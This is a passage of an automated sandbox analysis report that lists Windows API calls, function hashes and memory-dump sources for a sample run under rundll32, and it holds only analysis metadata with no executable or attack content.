                              • Opcode ID: f41768140c0654ec3889b671bdef07d481a4e2dbd9f894f0e6bf45ac568aaa66
                              • Instruction ID: f6d0d36a62d7c672bfd59cf11e42522e6751e0915520da79f3ac7d5db3ce203d
                              • Opcode Fuzzy Hash: f41768140c0654ec3889b671bdef07d481a4e2dbd9f894f0e6bf45ac568aaa66
                              • Instruction Fuzzy Hash: F4F0A930644308BFE705AAD5CC6AB5EBB68EF44714F6044B5A404A25C0E6707E008A14
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetStdHandle.KERNEL32(FFFFFFF5), ref: 043C79F6
                              • GetStdHandle.KERNEL32(000000F6), ref: 043C7A01
                              • GetFileType.KERNEL32(00000000), ref: 043C7A19
                              • GetConsoleOutputCP.KERNEL32(00000000), ref: 043C7A2B
                              • GetConsoleCP.KERNEL32(00000000), ref: 043C7A3C
                              • GetFileType.KERNEL32(00000000), ref: 043C7B87
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: ConsoleFileHandleType$Output
                              • String ID:
                              • API String ID: 393880136-0
                              • Opcode ID: a3c7aece40b78740b010e21e65a1d418d3b0aa9c3e018594b757685113b5be9b
                              • Instruction ID: 2b60ccbe137b9670817e4d6a74d6160386036177e88c5f1fd6417f79091e67c2
                              • Opcode Fuzzy Hash: a3c7aece40b78740b010e21e65a1d418d3b0aa9c3e018594b757685113b5be9b
                              • Instruction Fuzzy Hash: E551E474600712AAEF20EF688CC476236A8AF44364F14BA6DED15CF285E734FC418FA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 043C96B9
                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 043C96BF
                              • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 043C96D2
                              • GetLastError.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 043C96DB
                              • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,043C9752,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 043C9706
                              Strings
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: InformationLogicalProcessor$AddressErrorHandleLastModuleProc
                              • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                              • API String ID: 1184211438-79381301
                              • Opcode ID: dc834ccfc9fcb8ee22be25f9e62fbe7c7276ef0fbc6ef894a37cd43d48812ab6
                              • Instruction ID: fcb4a4c25f646721541444bca0295275ca7f631c4e32f2e593d8c515cff5136e
                              • Opcode Fuzzy Hash: dc834ccfc9fcb8ee22be25f9e62fbe7c7276ef0fbc6ef894a37cd43d48812ab6
                              • Instruction Fuzzy Hash: D7113DB1D41208EEEB10EFA5D945B9DB7F8EF44304F5590AEE414A7641E678BE40CB11
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 043F6E69
                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 043F6E85
                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 043F6EBE
                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 043F6F3B
                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 043F6F54
                              • VariantCopy.OLEAUT32(?), ref: 043F6F89
                              Strings
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                              • String ID:
                              • API String ID: 351091851-3916222277
                              • Opcode ID: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
                              • Instruction ID: 17f86529017d5016c8f58ec908465892f6c450b56a51c3c9ced12a7f2540183d
                              • Opcode Fuzzy Hash: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
                              • Instruction Fuzzy Hash: 9251FB7590062D9BDB22DF58CD81BD9B3BCAF58304F0062E5E609E7211D634BF858F61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • Sleep.KERNEL32(00000000,?), ref: 043C5DCA
                              • Sleep.KERNEL32(0000000A,00000000,?), ref: 043C5DE4
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: 80adfc8e854a8cd94dcca5ba0f96a32f8b0323e6cb5daf8191ef8602c7c40fa1
                              • Instruction ID: 51fc4f2524536572fe3e825a2bc06d9287b8f208a32ab9ff9cc435a90bb9fe5b
                              • Opcode Fuzzy Hash: 80adfc8e854a8cd94dcca5ba0f96a32f8b0323e6cb5daf8191ef8602c7c40fa1
                              • Instruction Fuzzy Hash: 1B710231601320AFE715CF68C988B5ABBD5EF85314F08A66ED8498B2D1E7B4BC41C791
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetCapture.USER32 ref: 045B7752
                              • IsWindowUnicode.USER32(00000000), ref: 045B7795
                              • SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 045B77B0
                              • SendMessageA.USER32(00000000,-0000BBEE,?,?), ref: 045B77CF
                              • GetWindowThreadProcessId.USER32(00000000), ref: 045B77DE
                              • GetWindowThreadProcessId.USER32(?,?), ref: 045B77EF
                              • SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 045B780F
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                              • String ID:
                              • API String ID: 1994056952-0
                              • Opcode ID: acee4a938bd02a54410868a0c46c4f6779eb5ef3b886609ee496b38d5591f89b
                              • Instruction ID: 77943180d8fe1ac826d6e20c325999bdef85c0a14d4dc88d00444933f0f997fc
                              • Opcode Fuzzy Hash: acee4a938bd02a54410868a0c46c4f6779eb5ef3b886609ee496b38d5591f89b
                              • Instruction Fuzzy Hash: 1F211C722042096FE760EA59ED41FA773DCEF8C254F248825FDE9C3642EB11F800A7A5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d754827e54f2c4372976691ceedb48bff4787378107a11b715ccb75b6cd802c7
                              • Instruction ID: f193eba13ab7cf26bfd789276c2105c02fea9845236739c6678d09d4c2f069c1
                              • Opcode Fuzzy Hash: d754827e54f2c4372976691ceedb48bff4787378107a11b715ccb75b6cd802c7
                              • Instruction Fuzzy Hash: 30C164627103205BE714AABCDC8936EB386DFC4325F18A67EE215CB385EA68FC458350
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 043C9DB8: GetCurrentThreadId.KERNEL32 ref: 043C9DBB
                              • GetTickCount.KERNEL32 ref: 043C9963
                              • GetTickCount.KERNEL32 ref: 043C997B
                              • GetCurrentThreadId.KERNEL32 ref: 043C99AA
                              • GetTickCount.KERNEL32 ref: 043C99D5
                              • GetTickCount.KERNEL32 ref: 043C9A0C
                              • GetTickCount.KERNEL32 ref: 043C9A36
                              • GetCurrentThreadId.KERNEL32 ref: 043C9AA6
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: CountTick$CurrentThread
                              • String ID:
                              • API String ID: 3968769311-0
                              • Opcode ID: 84c2a2a7048468cd6d1e9ce23cf3e3f60023f34486c2f63f17651a52c26f9745
                              • Instruction ID: 2aaaa4e1610e83d15cb6fe41a2b9c6074dac1c2f3c5b2366c0b6fedd92b1b8e3
                              • Opcode Fuzzy Hash: 84c2a2a7048468cd6d1e9ce23cf3e3f60023f34486c2f63f17651a52c26f9745
                              • Instruction Fuzzy Hash: 9D4184B12087419EE721EE7CC88435EBBE5AF85354F16A92DD4D887281EB74FC808752
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • ShellExecuteExW.SHELL32(?), ref: 045FCF42
                              • WaitForSingleObject.KERNEL32(?,000000FF,00000000,045FCFB0,?,00000000,045FCFD5,?,?,?,?), ref: 045FCF51
                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 045FCF73
                              • GetExitCodeProcess.KERNEL32(?,?), ref: 045FCF85
                              • CloseHandle.KERNEL32(?,00000001,?,00000000,000000FF,000004FF,00000001,?,00000000,000000FF,000004FF,?,000000FF,00000000,045FCFB0), ref: 045FCF95
                              Strings
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: Wait$CloseCodeExecuteExitHandleMultipleObjectObjectsProcessShellSingle
                              • String ID: runas
                              • API String ID: 1089270204-4000483414
                              • Opcode ID: 4ce9397f90b147bf3027f9f6840abb55cda97870c5464a36b1130f559cbddbf3
                              • Instruction ID: 1a8da799e7f351c614374034be75bd917e2702a2d3e7ccf37291d1114fce3495
                              • Opcode Fuzzy Hash: 4ce9397f90b147bf3027f9f6840abb55cda97870c5464a36b1130f559cbddbf3
                              • Instruction Fuzzy Hash: 1F314BB0A042089FEB11EF68D881A9AB7F9FF48304F508566E915DB294EB34FD05DB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,046108A8,00000000,?,043CAA6A,?,?,0461CB9C,0461CB9C,?,?,04611C38,043D1A03,046108A8), ref: 043CA9E5
                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,046108A8,00000000,?,043CAA6A,?,?,0461CB9C,0461CB9C,?,?,04611C38,043D1A03), ref: 043CA9EB
                              • GetStdHandle.KERNEL32(000000F5,00000000,00000002,046108A8,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,046108A8,00000000,?,043CAA6A,?,?,0461CB9C), ref: 043CAA06
                              • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,046108A8,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,046108A8,00000000,?,043CAA6A,?,?), ref: 043CAA0C
                              Strings
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: FileHandleWrite
                              • String ID: Error$Runtime error at 00000000
                              • API String ID: 3320372497-2970929446
                              • Opcode ID: 870ddc377733d422f9b42ccf96c2f1cac6b80ab0b4740830dcc32ac5bdf3d795
                              • Instruction ID: ddb5a4e6b4b8b46ce6425f2ff520293601f644e52ae8c16cdfd8059cf738e1d0
                              • Opcode Fuzzy Hash: 870ddc377733d422f9b42ccf96c2f1cac6b80ab0b4740830dcc32ac5bdf3d795
                              • Instruction Fuzzy Hash: E0F0F6616843587EF710B7905C0AFA9325CDB46B29F58360EB260E90D4FAA87CC49722
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 043C629A
                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 043C62A0
                              • GetStdHandle.KERNEL32(000000F4,043C53E8,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 043C62BF
                              • WriteFile.KERNEL32(00000000,000000F4,043C53E8,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 043C62C5
                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,043C53E8,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 043C62DC
                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,043C53E8,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 043C62E2
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: FileHandleWrite
                              • String ID:
                              • API String ID: 3320372497-0
                              • Opcode ID: 65c58950626c67d69786cafec70f846aae1a6c1f829b70feace310440d2412fd
                              • Instruction ID: 4b057d9a7587f87ed50a2e348663e9d3676ffa6f367831534194af3d024b5cec
                              • Opcode Fuzzy Hash: 65c58950626c67d69786cafec70f846aae1a6c1f829b70feace310440d2412fd
                              • Instruction Fuzzy Hash: F901C8952542343DF310F6B89C85FAF2A8CDF5A669F00261EB158E70D2DA55BC0483F2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • Sleep.KERNEL32(00000000,FFFFFFDC,043C597E), ref: 043C5A67
                              • Sleep.KERNEL32(0000000A,00000000,FFFFFFDC,043C597E), ref: 043C5A7D
                              • Sleep.KERNEL32(00000000,?,?,FFFFFFDC,043C597E), ref: 043C5AAB
                              • Sleep.KERNEL32(0000000A,00000000,?,?,FFFFFFDC,043C597E), ref: 043C5AC1
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: af874b941042ef38d43bfc80df7bcacd0d2521a68eb236da9ee97788a32e9fd7
                              • Instruction ID: 440b9300e181922e99283c3b572791a69a949063ec51e6d890f6577d405ce8d2
                              • Opcode Fuzzy Hash: af874b941042ef38d43bfc80df7bcacd0d2521a68eb236da9ee97788a32e9fd7
                              • Instruction Fuzzy Hash: DCC136726027619FD719CFA9D58472ABBE1FB85320F08916FD4058B395E7B4BC81CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • EnumWindows.USER32(045B64D4,00000000), ref: 045B661E
                              • ShowWindow.USER32(?,00000000,045B64D4,00000000), ref: 045B6660
                              • ShowOwnedPopups.USER32(00000000,?), ref: 045B668F
                              • ShowWindow.USER32(?,00000005), ref: 045B6704
                              • ShowOwnedPopups.USER32(00000000,?), ref: 045B6733
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: Show$OwnedPopupsWindow$EnumWindows
                              • String ID:
                              • API String ID: 315437064-0
                              • Opcode ID: 969f46655e877f22149c75bb21f815ff36fe95f601bd57b6174cc2ed60060b3c
                              • Instruction ID: 28db9d513aaaeca70bd830ba13f4a627c2dd6edcad71478ca1a48741e05ddb1e
                              • Opcode Fuzzy Hash: 969f46655e877f22149c75bb21f815ff36fe95f601bd57b6174cc2ed60060b3c
                              • Instruction Fuzzy Hash: 2F414F31600B419FE720DF78D488BEA73E6FB84358F150969D8A9D7291D734B885EB82
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
